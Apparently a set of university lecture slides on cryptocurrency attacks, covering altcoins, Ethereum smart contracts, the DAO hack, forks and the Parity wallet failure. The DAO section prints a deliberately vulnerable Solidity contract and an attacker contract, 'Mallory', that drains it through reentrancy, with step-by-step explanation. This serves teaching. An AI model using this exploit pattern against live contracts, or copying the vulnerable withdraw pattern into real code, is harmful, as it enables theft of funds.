More Cryptocurrency Attacks - PowerPoint PPT Presentation

More Cryptocurrency Attacks http://blockchain.unica.it/projects/ethereum-survey/index.html http://hackingdistributed.com/2016/06/18/analysis-of-the-dao- exploit/ https://hackernoon.com/what-caused-the-latest-100-million- ethereum-bug-and-a-detection-tool-for-similar- bugs-7b80f8ab7279

Last Class • Majority attacks • Block withholding attacks • Spam attacks • Sybil attacks • Blacklisting • Fungibility • Money laundering

Last Class • With the rise of 51% attacks: • why? to what end? • when will this stop? • What are the points of centralization in this network? • Is this inevitable?

Cryptocurrencies • First altcoin: Bitcoin testnet • Second altcoin: Namecoin (DNS system) • … • over two thousand altcoins/tokens/etc.

But… why? • Improvements to Bitcoin • Alternatives to Bitcoin • Other functionality complementary to Bitcoin • Make money for founders

But… how? • Altcoins: have their own blockchain • Tokens: built on top of cryptocurrencies

Alternative Proof of Work Mechanisms • Litecoin: scrypt • Cuckoo Cycle • etc.

Alternative functionality • NameCoin: DNS system • Ethereum: Turing complete • ZCash/Monero/others: “Private”

Namecoin • “completes” Zooko’s Triangle • Blockchain-based DNS • First fork of Bitcoin • Merge mined with Bitcoin: • same hash function

Ethereum • Currently the second most popular cryptocurrency • First proposed as a system built on top of Bitcoin • Started to create turing-complete money contracts “smart contracts” • Ether: currency which is input/output to contracts • Gas: execution cost of instructions

Smart Contracts • Run on blockchain and executed by all nodes • Created by posting a transaction • Identified by address • Can hold, receive, and send money • Once deployed, cannot be changed

Ethereum uses • DApps • Distributed applications • CryptoKitties! • Ponzi schemes! • Tokens • https://coinmarketcap.com/tokens/views/all/

The DAO • Crowdfunding platform • Envisioned as a leaderless organization • Anybody could hold DAO tokens • DAO creators together agreed on rules • Raised 12.7M Ether ($150M)

Simplified DAO • Solidity: • high-level programming language to write smart contracts with • python-ish • Enter contract: donate • Exit contract: withdraw • Fallback option:

Simplified DAO contract SimpleDAO { 
 mapping (address => uint) public credit; 
 function donate(address to){ credit[to] += msg.value; } function queryCredit(address to) returns (uint){ return credit[to]; } function withdraw(uint amount) { 
 if (credit[msg.sender]>= amount) { msg.sender.call.value(amount)(); credit[msg.sender]-=amount; }}}

Attack contract Mallory { 
 SimpleDAO public dao = SimpleDAO(0x354...); 
 address owner; 
 function Mallory(){owner = msg.sender; } 
 function() { dao.withdraw(dao.queryCredit(this)); } function getJackpot(){ owner.send(this.balance); }

Attack contract SimpleDAO { 
 mapping (address => uint) public credit; 
 function donate(address to){ credit[to] += msg.value; } function queryCredit(address to) returns (uint){ return credit[to]; } Step 1: Attacker donate s ether for Mallory.

Attack contract Mallory { 
 SimpleDAO public dao = SimpleDAO(0x354...); 
 address owner; 
 function Mallory(){owner = msg.sender; } 
 function() { dao.withdraw(dao.queryCredit(this)); } function getJackpot(){ owner.send(this.balance); } Step 1: Attacker donate s ether for Mallory. This triggers Mallory’s fallback.

Attack function withdraw(uint amount) { 
 if (credit[msg.sender]>= amount) { msg.sender.call.value(amount)(); credit[msg.sender]-=amount; } Step 2: Mallory’s fallback calls the withdraw function.

Attack function withdraw(uint amount) { 
 if (credit[msg.sender]>= amount) { msg.sender.call.value(amount)(); credit[msg.sender]-=amount; } Step 3: The withdraw function then invokes Mallory’s default again via call .

Attack contract Mallory { 
 SimpleDAO public dao = SimpleDAO(0x354...); 
 address owner; 
 function Mallory(){owner = msg.sender; } 
 function() { dao.withdraw(dao.queryCredit(this)); } function getJackpot(){ owner.send(this.balance); } Step 4: We then attempt to withdraw again. The last call to withdraw was interrupted before it could update the credit field, so we still have ether to withdraw!

Attack • We can repeat ad nauseam until: • contract gas is exhausted OR • balance of DAO is zero.

But wait! 7 days before drain started

But wait! 5 days before drain started

But wait! • Code was attacked after it was patched. • But how can that be? • Remember: once deployed, cannot change

Ethereum Price Shock

Forks • Fork: update in software • Hard Fork • requires software update; old version incompatible • Soft Fork • old version compatible with new software

Forks 29

What to do next with Ethereum? • Nothing • Gas limit • Ban spam addresses • Soft Fork • Hard Fork

What happened next https://www.ofnumbers.com/2016/07/28/ethereum-core-and- ethereum-classic-for-dummies/

Parity Multisig • Ethereum Wallet • One person “killing” a wallet killed every wallet that relied on the contract

Questions • If we can’t secure code in a normal case, how will we be able to secure it on a blockchain? • Do new blockchains create decentralization or centralization pressures? how?